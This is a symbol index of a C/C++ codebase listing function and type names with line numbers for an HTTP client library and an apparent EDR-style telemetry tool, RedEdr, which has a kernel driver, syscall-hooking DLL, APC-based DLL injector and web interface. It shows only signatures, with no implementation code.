function Result (line 7249) | inline Result ClientImpl::send_(Request &&req) {
function handle_request (line 7256) | inline bool ClientImpl::handle_request(Stream &strm, Request &req,
function redirect (line 7333) | inline bool ClientImpl::redirect(Request &req, Response &res, Error &err...
function write_content_with_provider (line 7390) | inline bool ClientImpl::write_content_with_provider(Stream &strm,
function write_request (line 7415) | inline bool ClientImpl::write_request(Stream &strm, Request &req,
function std (line 7533) | inline std::unique_ptr<Response> ClientImpl::send_with_content_provider(
function Result (line 7612) | inline Result ClientImpl::send_with_content_provider(
function process_request (line 7638) | inline bool ClientImpl::process_request(Stream &strm, Request &req,
function ContentProviderWithoutLength (line 7718) | inline ContentProviderWithoutLength ClientImpl::get_multipart_content_pr...
function process_socket (line 7762) | inline bool
function Result (line 7772) | inline Result ClientImpl::Get(const std::string &path) {
function Result (line 7776) | inline Result ClientImpl::Get(const std::string &path, Progress progress) {
function Result (line 7780) | inline Result ClientImpl::Get(const std::string &path, const Headers &he...
function Result (line 7784) | inline Result ClientImpl::Get(const std::string &path, const Headers &he...
function Result (line 7795) | inline Result ClientImpl::Get(const std::string &path,
function Result (line 7800) | inline Result ClientImpl::Get(const std::string &path,
function Result (line 7807) | inline Result ClientImpl::Get(const std::string &path, const Headers &he...
function Result (line 7812) | inline Result ClientImpl::Get(const std::string &path, const Headers &he...
function Result (line 7819) | inline Result ClientImpl::Get(const std::string &path,
function Result (line 7826) | inline Result ClientImpl::Get(const std::string &path, const Headers &he...
function Result (line 7833) | inline Result ClientImpl::Get(const std::string &path,
function Result (line 7841) | inline Result ClientImpl::Get(const std::string &path, const Headers &he...
function Result (line 7860) | inline Result ClientImpl::Get(const std::string &path, const Params &par...
function Result (line 7868) | inline Result ClientImpl::Get(const std::string &path, const Params &par...
function Result (line 7876) | inline Result ClientImpl::Get(const std::string &path, const Params &par...
function Result (line 7891) | inline Result ClientImpl::Head(const std::string &path) {
function Result (line 7895) | inline Result ClientImpl::Head(const std::string &path,
function Result (line 7905) | inline Result ClientImpl::Post(const std::string &path) {
function Result (line 7909) | inline Result ClientImpl::Post(const std::string &path,
function Result (line 7914) | inline Result ClientImpl::Post(const std::string &path, const char *body,
function Result (line 7920) | inline Result ClientImpl::Post(const std::string &path, const Headers &h...
function Result (line 7927) | inline Result ClientImpl::Post(const std::string &path, const Headers &h...
function Result (line 7935) | inline Result ClientImpl::Post(const std::string &path, const std::strin...
function Result (line 7940) | inline Result ClientImpl::Post(const std::string &path, const std::strin...
function Result (line 7946) | inline Result ClientImpl::Post(const std::string &path, const Headers &h...
function Result (line 7954) | inline Result ClientImpl::Post(const std::string &path, const Headers &h...
function Result (line 7963) | inline Result ClientImpl::Post(const std::string &path, const Params &pa...
function Result (line 7967) | inline Result ClientImpl::Post(const std::string &path, size_t content_l...
function Result (line 7974) | inline Result ClientImpl::Post(const std::string &path,
function Result (line 7980) | inline Result ClientImpl::Post(const std::string &path, const Headers &h...
function Result (line 7989) | inline Result ClientImpl::Post(const std::string &path, const Headers &h...
function Result (line 7997) | inline Result ClientImpl::Post(const std::string &path, const Headers &h...
function Result (line 8003) | inline Result ClientImpl::Post(const std::string &path, const Headers &h...
function Result (line 8010) | inline Result ClientImpl::Post(const std::string &path,
function Result (line 8015) | inline Result ClientImpl::Post(const std::string &path, const Headers &h...
function Result (line 8024) | inline Result ClientImpl::Post(const std::string &path, const Headers &h...
function Result (line 8037) | inline Result
function Result (line 8050) | inline Result ClientImpl::Put(const std::string &path) {
function Result (line 8054) | inline Result ClientImpl::Put(const std::string &path, const char *body,
function Result (line 8060) | inline Result ClientImpl::Put(const std::string &path, const Headers &he...
function Result (line 8067) | inline Result ClientImpl::Put(const std::string &path, const Headers &he...
function Result (line 8075) | inline Result ClientImpl::Put(const std::string &path, const std::string...
function Result (line 8080) | inline Result ClientImpl::Put(const std::string &path, const std::string...
function Result (line 8086) | inline Result ClientImpl::Put(const std::string &path, const Headers &he...
function Result (line 8094) | inline Result ClientImpl::Put(const std::string &path, const Headers &he...
function Result (line 8103) | inline Result ClientImpl::Put(const std::string &path, size_t content_le...
function Result (line 8110) | inline Result ClientImpl::Put(const std::string &path,
function Result (line 8116) | inline Result ClientImpl::Put(const std::string &path, const Headers &he...
function Result (line 8125) | inline Result ClientImpl::Put(const std::string &path, const Headers &he...
function Result (line 8133) | inline Result ClientImpl::Put(const std::string &path, const Params &par...
function Result (line 8137) | inline Result ClientImpl::Put(const std::string &path, const Headers &he...
function Result (line 8143) | inline Result ClientImpl::Put(const std::string &path, const Headers &he...
function Result (line 8150) | inline Result ClientImpl::Put(const std::string &path,
function Result (line 8155) | inline Result ClientImpl::Put(const std::string &path, const Headers &he...
function Result (line 8164) | inline Result ClientImpl::Put(const std::string &path, const Headers &he...
function Result (line 8177) | inline Result
function Result (line 8189) | inline Result ClientImpl::Patch(const std::string &path) {
function Result (line 8193) | inline Result ClientImpl::Patch(const std::string &path, const char *body,
function Result (line 8199) | inline Result ClientImpl::Patch(const std::string &path, const char *body,
function Result (line 8206) | inline Result ClientImpl::Patch(const std::string &path, const Headers &...
function Result (line 8212) | inline Result ClientImpl::Patch(const std::string &path, const Headers &...
function Result (line 8221) | inline Result ClientImpl::Patch(const std::string &path,
function Result (line 8227) | inline Result ClientImpl::Patch(const std::string &path,
function Result (line 8234) | inline Result ClientImpl::Patch(const std::string &path, const Headers &...
function Result (line 8240) | inline Result ClientImpl::Patch(const std::string &path, const Headers &...
function Result (line 8249) | inline Result ClientImpl::Patch(const std::string &path, size_t content_...
function Result (line 8256) | inline Result ClientImpl::Patch(const std::string &path,
function Result (line 8262) | inline Result ClientImpl::Patch(const std::string &path, const Headers &...
function Result (line 8271) | inline Result ClientImpl::Patch(const std::string &path, const Headers &...
function Result (line 8279) | inline Result ClientImpl::Delete(const std::string &path) {
function Result (line 8283) | inline Result ClientImpl::Delete(const std::string &path,
function Result (line 8288) | inline Result ClientImpl::Delete(const std::string &path, const char *body,
function Result (line 8294) | inline Result ClientImpl::Delete(const std::string &path, const char *body,
function Result (line 8301) | inline Result ClientImpl::Delete(const std::string &path,
function Result (line 8308) | inline Result ClientImpl::Delete(const std::string &path,
function Result (line 8325) | inline Result ClientImpl::Delete(const std::string &path,
function Result (line 8331) | inline Result ClientImpl::Delete(const std::string &path,
function Result (line 8339) | inline Result ClientImpl::Delete(const std::string &path,
function Result (line 8346) | inline Result ClientImpl::Delete(const std::string &path,
function Result (line 8355) | inline Result ClientImpl::Options(const std::string &path) {
function Result (line 8359) | inline Result ClientImpl::Options(const std::string &path,
function stop (line 8369) | inline void ClientImpl::stop() {
function set_connection_timeout (line 8403) | inline void ClientImpl::set_connection_timeout(time_t sec, time_t usec) {
function set_read_timeout (line 8408) | inline void ClientImpl::set_read_timeout(time_t sec, time_t usec) {
function set_write_timeout (line 8413) | inline void ClientImpl::set_write_timeout(time_t sec, time_t usec) {
function set_basic_auth (line 8418) | inline void ClientImpl::set_basic_auth(const std::string &username,
function set_bearer_token_auth (line 8424) | inline void ClientImpl::set_bearer_token_auth(const std::string &token) {
function set_digest_auth (line 8429) | inline void ClientImpl::set_digest_auth(const std::string &username,
function set_keep_alive (line 8436) | inline void ClientImpl::set_keep_alive(bool on) { keep_alive_ = on; }
function set_follow_location (line 8438) | inline void ClientImpl::set_follow_location(bool on) { follow_location_ ...
function set_url_encode (line 8440) | inline void ClientImpl::set_url_encode(bool on) { url_encode_ = on; }
function set_hostname_addr_map (line 8442) | inline void
function set_default_headers (line 8447) | inline void ClientImpl::set_default_headers(Headers headers) {
function set_header_writer (line 8451) | inline void ClientImpl::set_header_writer(
function set_address_family (line 8456) | inline void ClientImpl::set_address_family(int family) {
function set_tcp_nodelay (line 8460) | inline void ClientImpl::set_tcp_nodelay(bool on) { tcp_nodelay_ = on; }
function set_socket_options (line 8462) | inline void ClientImpl::set_socket_options(SocketOptions socket_options) {
function set_compress (line 8466) | inline void ClientImpl::set_compress(bool on) { compress_ = on; }
function set_decompress (line 8468) | inline void ClientImpl::set_decompress(bool on) { decompress_ = on; }
function set_interface (line 8470) | inline void ClientImpl::set_interface(const std::string &intf) {
function set_proxy (line 8474) | inline void ClientImpl::set_proxy(const std::string &host, int port) {
function set_proxy_basic_auth (line 8479) | inline void ClientImpl::set_proxy_basic_auth(const std::string &username,
function set_proxy_bearer_token_auth (line 8485) | inline void ClientImpl::set_proxy_bearer_token_auth(const std::string &t...
function set_proxy_digest_auth (line 8490) | inline void ClientImpl::set_proxy_digest_auth(const std::string &username,
function set_ca_cert_path (line 8496) | inline void ClientImpl::set_ca_cert_path(const std::string &ca_cert_file...
function set_ca_cert_store (line 8502) | inline void ClientImpl::set_ca_cert_store(X509_STORE *ca_cert_store) {
function X509_STORE (line 8508) | inline X509_STORE *ClientImpl::create_ca_cert_store(const char *ca_cert,
function enable_server_certificate_verification (line 8535) | inline void ClientImpl::enable_server_certificate_verification(bool enab...
function set_logger (line 8540) | inline void ClientImpl::set_logger(Logger logger) {
function namespace (line 8548) | namespace detail {
function is_readable (line 8679) | inline bool SSLSocketStream::is_readable() const {
function write (line 8720) | inline ssize_t SSLSocketStream::write(const char *ptr, size_t size) {
function SSLServer (line 8768) | inline SSLServer::SSLServer(const char *cert_path, const char *private_k...
function SSLServer (line 8802) | inline SSLServer::SSLServer(X509 *cert, EVP_PKEY *private_key,
function SSLServer (line 8826) | inline SSLServer::SSLServer(
function SSLServer (line 8837) | inline SSLServer::~SSLServer() {
function SSL_CTX (line 8843) | inline SSL_CTX *SSLServer::ssl_context() const { return ctx_; }
function update_certs (line 8845) | inline void SSLServer::update_certs(X509 *cert, EVP_PKEY *private_key,
function process_and_close_socket (line 8858) | inline bool SSLServer::process_and_close_socket(socket_t sock) {
function SSLClient (line 8891) | inline SSLClient::SSLClient(const std::string &host)
function SSLClient (line 8894) | inline SSLClient::SSLClient(const std::string &host, int port)
function SSLClient (line 8897) | inline SSLClient::SSLClient(const std::string &host, int port,
function SSLClient (line 8926) | inline SSLClient::SSLClient(const std::string &host, int port,
function SSLClient (line 8952) | inline SSLClient::~SSLClient() {
function set_ca_cert_store (line 8962) | inline void SSLClient::set_ca_cert_store(X509_STORE *ca_cert_store) {
function load_ca_cert_store (line 8975) | inline void SSLClient::load_ca_cert_store(const char *ca_cert,
function SSL_CTX (line 8984) | inline SSL_CTX *SSLClient::ssl_context() const { return ctx_; }
function create_and_connect_socket (line 8986) | inline bool SSLClient::create_and_connect_socket(Socket &socket, Error &...
function connect_with_proxy (line 8991) | inline bool SSLClient::connect_with_proxy(Socket &socket, Response &res,
function load_certs (line 9059) | inline bool SSLClient::load_certs() {
function initialize_ssl (line 9091) | inline bool SSLClient::initialize_ssl(Socket &socket, Error &error) {
function shutdown_ssl (line 9157) | inline void SSLClient::shutdown_ssl(Socket &socket, bool shutdown_gracef...
function shutdown_ssl_impl (line 9161) | inline void SSLClient::shutdown_ssl_impl(Socket &socket,
function process_socket (line 9175) | inline bool
function verify_host (line 9186) | inline bool SSLClient::verify_host(X509 *server_cert) const {
function verify_host_with_subject_alt_name (line 9212) | inline bool
function verify_host_with_common_name (line 9269) | inline bool SSLClient::verify_host_with_common_name(X509 *server_cert) c...
FILE: RedEdr/jsonw.hpp
class JsonTokenW (line 23) | class JsonTokenW
type Type (line 26) | enum class Type
method JsonTokenW (line 44) | JsonTokenW(std::wistream& ins)
method type (line 457) | enum Type type() const { return type_; }
method int_fast64_t (line 458) | int_fast64_t integer() const { return integer_; }
method frac (line 459) | long double frac() const { return frac_; }
method wstring (line 460) | std::wstring wstring() const { return wstring_; }
method boolean (line 461) | bool boolean() const { return boolean_; }
method isskippable (line 465) | static bool isskippable(wchar_t character)
method findnext (line 479) | static bool findnext(std::wistream& ins)
method parse (line 525) | static bool parse(std::wistream& ins, std::queue<JsonTokenW>& tokens)
type Type (line 549) | enum Type
class JsonW (line 560) | class JsonW
method JsonW (line 582) | JsonW()
method JsonW (line 588) | explicit JsonW(const JsonW& rhs)
method JsonW (line 593) | explicit JsonW(std::ifstream& fin)
method JsonW (line 619) | explicit JsonW(const char* utf8str)
method JsonW (line 635) | explicit JsonW(const wchar_t* wstr)
method JsonW (line 647) | JsonW(const wchar_t* ucsdata, size_t size)
method JsonW (line 662) | JsonW(const char* utf8data, size_t length)
method JsonW (line 687) | JsonW(std::queue<JsonTokenW>& tokens)
method parse (line 694) | void parse(std::queue<JsonTokenW>& tokens)
method copy (line 751) | void copy(const JsonW& rhs)
method valid (line 779) | bool valid() const { return valid_; }
method type (line 782) | int type() const { return type_; }
method size (line 793) | size_t size() const
method integer (line 814) | long long integer() const { return integer_; }
method frac (line 815) | long double frac() const { return frac_; }
method wstr (line 816) | std::wstring wstr() const { return wstring_; }
method str (line 817) | std::string str() const
method boolean (line 822) | bool boolean() const { return boolean_; }
method integer (line 824) | void integer(long long integer)
method frac (line 831) | void frac(long double frac)
method wstr (line 838) | void wstr(const std::wstring& wstr)
method wstr (line 845) | void wstr(const wchar_t* wstr)
method wstr (line 852) | void wstr(const wchar_t* wstr, size_t length)
method str (line 860) | void str(const std::string& str)
method str (line 868) | void str(const char* str)
method str (line 876) | void str(const char* str, size_t length)
method boolean (line 885) | void boolean(bool boolean)
method reset (line 892) | void reset()
method json (line 897) | void json(const std::string& text)
method json (line 915) | void json(const char* text)
method json (line 921) | void json(const char* text, size_t size)
method wkeys (line 932) | void wkeys(std::vector<std::wstring>& keys) const
method keys (line 945) | void keys(std::vector<std::string>& keys) const
method get (line 961) | std::shared_ptr<JsonW> get(const std::wstring& wkey) const
method get (line 972) | std::shared_ptr<JsonW> get(const std::string& key) const
method erase (line 982) | bool erase(std::wstring wkey)
method erase (line 994) | bool erase(std::string key)
method add (line 1004) | bool add(std::wstring wkey, std::shared_ptr<JsonW> jvalue)
method add (line 1022) | bool add(std::string key, std::shared_ptr<JsonW> jvalue)
method add (line 1031) | bool add(std::wstring wkey, long long integer)
method add (line 1038) | bool add(std::wstring wkey, long integer)
method add (line 1043) | bool add(std::wstring wkey, int integer)
method add (line 1048) | bool add(std::wstring wkey, short integer)
method add (line 1053) | bool add(std::string key, long long integer)
method add (line 1060) | bool add(std::string key, long integer)
method add (line 1065) | bool add(std::string key, int integer)
method add (line 1070) | bool add(std::string key, short integer)
method add (line 1075) | bool add(std::wstring wkey, long double frac)
method add (line 1082) | bool add(std::wstring wkey, double frac)
method add (line 1087) | bool add(std::wstring wkey, float frac)
method add (line 1092) | bool add(std::string key, long double frac)
method add (line 1099) | bool add(std::string key, double frac)
method add (line 1104) | bool add(std::string key, float frac)
method add (line 1109) | bool add(std::wstring wkey, std::wstring wstr)
method add (line 1116) | bool add(std::string key, std::string str)
method add (line 1123) | bool add(std::wstring wkey, bool boolean)
method add (line 1130) | bool add(std::string key, bool boolean)
method get (line 1142) | std::shared_ptr<JsonW> get(size_t idx) const
method add (line 1153) | bool add(std::shared_ptr<JsonW> junit)
method add (line 1175) | bool add(long long integer)
method add (line 1182) | bool add(long integer)
method add (line 1187) | bool add(int integer)
method add (line 1192) | bool add(short integer)
method add (line 1197) | bool add(long double frac)
method add (line 1204) | bool add(double frac)
method add (line 1209) | bool add(float frac)
method add (line 1214) | bool add(std::wstring wstr)
method add (line 1221) | bool add(std::string str)
method add (line 1228) | bool add(bool boolean)
method erase (line 1237) | bool erase(size_t idx)
method JsonW (line 1258) | JsonW& operator=(short value)
method JsonW (line 1269) | JsonW& operator=(int value)
method JsonW (line 1280) | JsonW& operator=(long value)
method JsonW (line 1291) | JsonW& operator=(long long value)
method JsonW (line 1302) | JsonW& operator=(long double value)
method JsonW (line 1313) | JsonW& operator=(double value)
method JsonW (line 1324) | JsonW& operator=(float value)
method JsonW (line 1335) | JsonW& operator=(const wchar_t* value)
method JsonW (line 1346) | JsonW& operator=(const std::wstring& value)
method JsonW (line 1357) | JsonW& operator=(const char* value)
method JsonW (line 1369) | JsonW& operator=(std::string value)
method JsonW (line 1381) | JsonW& operator=(bool boolean)
method JsonW (line 1393) | JsonW& operator=(const JsonW& junit)
method JsonW (line 1399) | JsonW& operator[] (size_t index)
method JsonW (line 1419) | JsonW& operator[] (int index)
method JsonW (line 1444) | JsonW& operator[] (const char* name)
method JsonW (line 1470) | JsonW& operator[] (const std::string& name)
method JsonW (line 1496) | JsonW& operator[] (const wchar_t* name)
method JsonW (line 1521) | JsonW& operator[] (const std::wstring& wname)
method wtext (line 1544) | std::wstring wtext(bool singleline = true) const
method text (line 1552) | std::string text(bool singleline = true) const
method JsonW (line 1572) | static JsonW& bad()
method jobject (line 1582) | static bool jobject(std::queue<JsonTokenW>& tokens, std::map<std::wstr...
method jarray (line 1666) | static bool jarray(std::queue<JsonTokenW>& tokens, std::vector<std::sh...
method clean (line 2061) | void clean()
method init (line 2071) | void init(std::wistream& ins)
FILE: RedEdr/kernelinterface.cpp
function BOOL (line 14) | BOOL ConfigureKernelDriver(int enable) {
function BOOL (line 128) | BOOL LoadKernelDriver() {
function BOOL (line 209) | BOOL UnloadKernelDriver() {
FILE: RedEdr/kernelreader.cpp
function KernelReaderInit (line 31) | bool KernelReaderInit(std::vector<HANDLE>& threads) {
function DWORD (line 60) | DWORD WINAPI KernelReaderProcessingThread(LPVOID param) {
function KernelReaderShutdown (line 93) | void KernelReaderShutdown() {
FILE: RedEdr/logging.cpp
function InitLogFile (line 25) | void InitLogFile() {
function GetAgentLogs (line 36) | std::vector <std::string> GetAgentLogs() {
function LOG_A (line 41) | void LOG_A(int verbosity, const char* format, ...)
function LOG_W (line 110) | void LOG_W(int verbosity, const wchar_t* format, ...)
FILE: RedEdr/logreader.cpp
function LogReaderStopAll (line 15) | void LogReaderStopAll() {
function tailFileW (line 22) | void tailFileW(const wchar_t* filePath) {
function findFiles (line 84) | std::wstring findFiles(const std::wstring& directory, const std::wstring...
function DWORD (line 114) | DWORD WINAPI LogReaderProcessingThread(LPVOID param) {
function BOOL (line 123) | BOOL InitializeLogReader(std::vector<HANDLE>& threads) {
FILE: RedEdr/manager.cpp
function BOOL (line 27) | BOOL ManagerApplyNewTargets(std::vector<std::string> traceNames) {
function BOOL (line 67) | BOOL ManagerStart(std::vector<HANDLE>& threads) {
function ManagerShutdown (line 181) | void ManagerShutdown() {
FILE: RedEdr/pplmanager.cpp
function BOOL (line 23) | BOOL ConnectPplService() {
function BOOL (line 34) | BOOL EnablePplProducer(BOOL e, std::vector<std::string> targetNames, boo...
function BOOL (line 75) | BOOL DisablePplProducer() {
function BOOL (line 108) | BOOL StartThePplService() {
function BOOL (line 129) | BOOL ShutdownPplService() {
function BOOL (line 163) | BOOL InstallElamCertPpl()
function BOOL (line 195) | BOOL InstallPplService()
function BOOL (line 257) | BOOL StartPplService()
function BOOL (line 304) | BOOL remove_ppl_service() {
FILE: RedEdr/pplreader.cpp
function PplReaderInit (line 29) | bool PplReaderInit(std::vector<HANDLE>& threads) {
function DWORD (line 63) | DWORD WINAPI PplReaderThread(LPVOID param) {
function PplReaderClient (line 102) | void PplReaderClient(PipeServer* pipeServer) {
function PplReaderShutdown (line 132) | void PplReaderShutdown() {
FILE: RedEdr/privileges.cpp
function GetUserTokenForExecution (line 10) | bool GetUserTokenForExecution(HANDLE& hTokenDup) {
function EnablePrivilege (line 81) | bool EnablePrivilege(HANDLE hToken, LPCWSTR privilege) {
function CheckPrivilege (line 103) | bool CheckPrivilege(HANDLE hToken, LPCWSTR privilege) {
function RunsAsSystem (line 123) | bool RunsAsSystem() {
function BOOL (line 150) | BOOL RunsAsSystem_bak() {
function RunsAsAdmin (line 213) | bool RunsAsAdmin() {
function PrintCurrentUser (line 230) | void PrintCurrentUser() {
function BOOL (line 239) | BOOL PermissionMakeMeDebug() {
FILE: RedEdr/serviceutils.cpp
function BOOL (line 7) | BOOL DoesServiceExist(LPCWSTR serviceName) {
function BOOL (line 31) | BOOL IsServiceRunning(LPCWSTR driverName) {
FILE: RedEdr/shared.js
function displayEvents (line 3) | function displayEvents(events) {
function myHex (line 84) | function myHex(num) {
FILE: RedEdr/webserver.cpp
function StripToFirstDot (line 40) | std::wstring StripToFirstDot(const std::wstring& input) {
function GetFilesInDirectory (line 49) | std::vector<std::wstring> GetFilesInDirectory(const std::wstring& direct...
function getRecordingsAsJson (line 74) | std::string getRecordingsAsJson() {
function GetPplLogs (line 95) | std::vector<std::string> GetPplLogs() {
function HasAllowedExtension (line 111) | bool HasAllowedExtension(const std::string& filename, const std::vector<...
function DWORD (line 121) | DWORD WINAPI WebserverThread(LPVOID param) {
function InitializeWebServer (line 336) | int InitializeWebServer(std::vector<HANDLE>& threads, int port) {
function StopWebServer (line 356) | void StopWebServer() {
FILE: RedEdrDll/detours.h
type LONG (line 133) | typedef LONG LONG_PTR;
type ULONG (line 134) | typedef ULONG ULONG_PTR;
type GUID (line 333) | typedef struct _GUID
type DETOUR_TRAMPOLINE (line 384) | typedef struct _DETOUR_TRAMPOLINE DETOUR_TRAMPOLINE, *PDETOUR_TRAMPOLINE;
type DETOUR_SECTION_HEADER (line 393) | typedef struct _DETOUR_SECTION_HEADER
type DETOUR_SECTION_RECORD (line 418) | typedef struct _DETOUR_SECTION_RECORD
type DETOUR_CLR_HEADER (line 425) | typedef struct _DETOUR_CLR_HEADER
type DETOUR_EXE_RESTORE (line 439) | typedef struct _DETOUR_EXE_RESTORE
type DETOUR_EXE_HELPER (line 481) | typedef struct _DETOUR_EXE_HELPER
type VOID (line 554) | typedef VOID * PDETOUR_BINARY;
type VOID (line 555) | typedef VOID * PDETOUR_LOADED_BINARY;
type IMAGEHLP_MODULE (line 934) | typedef IMAGEHLP_MODULE IMAGEHLP_MODULE64;
type PIMAGEHLP_MODULE (line 935) | typedef PIMAGEHLP_MODULE PIMAGEHLP_MODULE64;
type IMAGEHLP_SYMBOL (line 936) | typedef IMAGEHLP_SYMBOL SYMBOL_INFO;
type PIMAGEHLP_SYMBOL (line 937) | typedef PIMAGEHLP_SYMBOL PSYMBOL_INFO;
function LONG (line 939) | static inline
type DETOUR_SYM_INFO (line 972) | typedef struct _DETOUR_SYM_INFO
type DETOUR_IA64_BUNDLE (line 1039) | struct DETOUR_IA64_BUNDLE
FILE: RedEdrDll/dllhelper.cpp
type __Config (line 15) | struct __Config {
type _MEMORY_INFORMATION_CLASS (line 26) | enum _MEMORY_INFORMATION_CLASS {
function InitDllPipe (line 35) | void InitDllPipe() {
function SendDllPipe (line 59) | void SendDllPipe(char* buffer) {
function doInitSym (line 72) | void doInitSym(HANDLE hProcess) {
function LogMyStackTrace (line 88) | size_t LogMyStackTrace(char* buf, size_t buf_size) {
FILE: RedEdrDll/dllmain.cpp
function Unicodestring2wcharAlloc (line 20) | void Unicodestring2wcharAlloc(const UNICODE_STRING* ustr, wchar_t* dest,...
function NTSTATUS (line 58) | static NTSTATUS NTAPI Catch_NtAllocateVirtualMemory(
function NTSTATUS (line 122) | static NTSTATUS NTAPI Catch_NtFreeVirtualMemory(
function NTSTATUS (line 181) | static NTSTATUS NTAPI Catch_NtProtectVirtualMemory(
type _SECTION_INHERIT (line 228) | enum _SECTION_INHERIT {
function NTSTATUS (line 247) | NTSTATUS NTAPI Catch_NtMapViewOfSection(
function NTSTATUS (line 309) | NTSTATUS NTAPI Catch_NtWriteVirtualMemory(
function NTSTATUS (line 351) | NTSTATUS NTAPI Catch_NtReadVirtualMemory(
function NTSTATUS (line 428) | NTSTATUS NTAPI Catch_LdrLoadDll(
function NTSTATUS (line 472) | NTSTATUS NTAPI Catch_LdrGetProcedureAddress(
function NTSTATUS (line 519) | NTSTATUS NTAPI Catch_NtQueueApcThread(
function NTSTATUS (line 558) | NTSTATUS NTAPI Catch_NtQueueApcThreadEx(
function NTSTATUS (line 605) | NTSTATUS NTAPI Catch_NtCreateProcess(
function NTSTATUS (line 651) | NTSTATUS NTAPI Catch_NtCreateThread(
function NTSTATUS (line 706) | NTSTATUS NTAPI Catch_NtCreateThreadEx(
function NTSTATUS (line 754) | NTSTATUS NTAPI Catch_NtOpenProcess(
function NTSTATUS (line 790) | NTSTATUS NTAPI Catch_NtLoadDriver(
function NTSTATUS (line 835) | NTSTATUS NTAPI Catch_NtCreateNamedPipeFile(
function NTSTATUS (line 887) | NTSTATUS NTAPI Catch_NtOpenThread(
function NTSTATUS (line 927) | NTSTATUS NTAPI Catch_NtCreateSection(
function NTSTATUS (line 979) | NTSTATUS NTAPI Catch_NtCreateProcessEx(
type _EVENT_TYPE (line 1018) | enum _EVENT_TYPE {
function NTSTATUS (line 1031) | NTSTATUS NTAPI Catch_NtCreateEvent(
type _TIMER_TYPE (line 1062) | enum _TIMER_TYPE {
function NTSTATUS (line 1074) | NTSTATUS NTAPI Catch_NtCreateTimer(
function NTSTATUS (line 1111) | NTSTATUS NTAPI Catch_NtCreateTimer2(
function NTSTATUS (line 1266) | NTSTATUS NTAPI Catch_NtResumeThread(
function DWORD (line 1295) | DWORD WINAPI InitHooksThread(LPVOID param) {
function BOOL (line 1389) | BOOL WINAPI DllMain(HINSTANCE hinst, DWORD dwReason, LPVOID reserved)
FILE: RedEdrDll/logging.cpp
function LOG_A (line 5) | void LOG_A(int verbosity, const char* format, ...)
function LOG_W (line 19) | void LOG_W(int verbosity, const wchar_t* format, ...)
FILE: RedEdrDriver/Driver.c
function NTSTATUS (line 25) | NTSTATUS MyDriverDeviceControl(PDEVICE_OBJECT DeviceObject, PIRP Irp) {
function LoadKernelCallbacks (line 139) | void LoadKernelCallbacks() {
function RedEdrUnload (line 224) | void RedEdrUnload(_In_ PDRIVER_OBJECT DriverObject) {
function NTSTATUS (line 255) | NTSTATUS MyDriverCreateClose(PDEVICE_OBJECT DeviceObject, PIRP Irp) {
function NTSTATUS (line 266) | NTSTATUS DriverEntry(_In_ PDRIVER_OBJECT DriverObject, _In_ PUNICODE_STR...
FILE: RedEdrDriver/hashcache.c
function NTSTATUS (line 11) | NTSTATUS InitializeHashTable()
function NTSTATUS (line 19) | NTSTATUS AddProcessInfo(HANDLE ProcessId, PPROCESS_INFO ProcessInfo)
function PPROCESS_INFO (line 46) | PPROCESS_INFO LookupProcessInfo(HANDLE ProcessId)
function NTSTATUS (line 68) | NTSTATUS RemoveProcessInfo(HANDLE ProcessId)
function VOID (line 98) | VOID FreeHashTable()
function ULONG (line 134) | ULONG HashFunction(HANDLE ProcessId)
FILE: RedEdrDriver/hashcache.h
type PROCESS_INFO (line 9) | typedef struct _PROCESS_INFO {
type HASH_ENTRY (line 23) | typedef struct _HASH_ENTRY {
FILE: RedEdrDriver/kapcinjector.c
type PVOID (line 25) | typedef PVOID(*fnLoadLibraryExA)(
type INJECTION_DATA (line 31) | typedef struct _INJECTION_DATA // _SIRIFEF_INJECTION_DATA in article
type GET_ADDRESS (line 41) | typedef struct GET_ADDRESS
type KAPC_ENVIRONMENT (line 48) | typedef enum _KAPC_ENVIRONMENT
type VOID (line 62) | typedef VOID KKERNEL_ROUTINE(
function VOID (line 96) | VOID NTAPI APCKernelRoutine(PKAPC Apc, PKNORMAL_ROUTINE* NormalRoutine, ...
function NTSTATUS (line 107) | NTSTATUS DllInject(HANDLE ProcessId, PEPROCESS PeProcess, PETHREAD PeThr...
function VOID (line 189) | VOID WorkerRoutine(PVOID Context)
function VOID (line 200) | VOID NTAPI APCInjectorRoutine(PKAPC Apc, PKNORMAL_ROUTINE* NormalRoutine...
function PVOID (line 250) | PVOID CustomGetProcAddress(PVOID pModuleBase, UNICODE_STRING functionNam...
function KapcInjectDll (line 293) | int KapcInjectDll(IN PUNICODE_STRING ImageName, IN HANDLE ProcessId, IN ...
FILE: RedEdrDriver/kcallbacks.c
type PROCESS_LOGGING_INFORMATION (line 48) | typedef union _PROCESS_LOGGING_INFORMATION {
function BOOLEAN (line 65) | static BOOLEAN EnableProcessTelemetryLogging(PEPROCESS Process) {
function LogProcessTelemetryLoggingFlags (line 124) | static void LogProcessTelemetryLoggingFlags(PEPROCESS Process, HANDLE pi...
function VOID (line 182) | VOID EnableTelemetryLoggingForProcessByName(PCWSTR targetName) {
function InitCallbacks (line 275) | int InitCallbacks() {
function UninitCallbacks (line 297) | void UninitCallbacks() {
function CreateProcessNotifyRoutine (line 302) | void CreateProcessNotifyRoutine(PEPROCESS process, HANDLE pid, PPS_CREAT...
function CreateThreadNotifyRoutine (line 415) | void CreateThreadNotifyRoutine(HANDLE ProcessId, HANDLE ThreadId, BOOLEA...
function LoadImageNotifyRoutine (line 439) | void LoadImageNotifyRoutine(PUNICODE_STRING FullImageName, HANDLE Proces...
type TD_CALL_CONTEXT (line 492) | typedef struct _TD_CALL_CONTEXT
function TdSetCallContext (line 502) | void TdSetCallContext(
function OB_PREOP_CALLBACK_STATUS (line 531) | OB_PREOP_CALLBACK_STATUS CBTdPreOperationCallback(
FILE: RedEdrDriver/kcallbacks.h
type TD_CALLBACK_PARAMETERS (line 12) | typedef struct _TD_CALLBACK_PARAMETERS {
type TD_CALLBACK_REGISTRATION (line 17) | typedef struct _TD_CALLBACK_REGISTRATION {
FILE: RedEdrDriver/settings.c
function init_settings (line 8) | void init_settings() {
function print_settings (line 24) | void print_settings() {
FILE: RedEdrDriver/settings.h
type Settings (line 7) | typedef struct _Settings{
FILE: RedEdrDriver/upipe.c
function InitializePipe (line 17) | void InitializePipe() {
function CleanupPipe (line 23) | void CleanupPipe() {
function IsUserspacePipeConnected (line 28) | int IsUserspacePipeConnected() {
function LogEvent (line 39) | int LogEvent(char* message) {
function DisconnectUserspacePipe (line 93) | void DisconnectUserspacePipe() {
function ConnectUserspacePipe (line 110) | int ConnectUserspacePipe() {
FILE: RedEdrDriver/utils.c
function LOG_A (line 9) | void LOG_A(int severity, const char* format, ...)
function IsSubstringInUnicodeString (line 29) | int IsSubstringInUnicodeString(PUNICODE_STRING pDestString, PCWSTR pSubS...
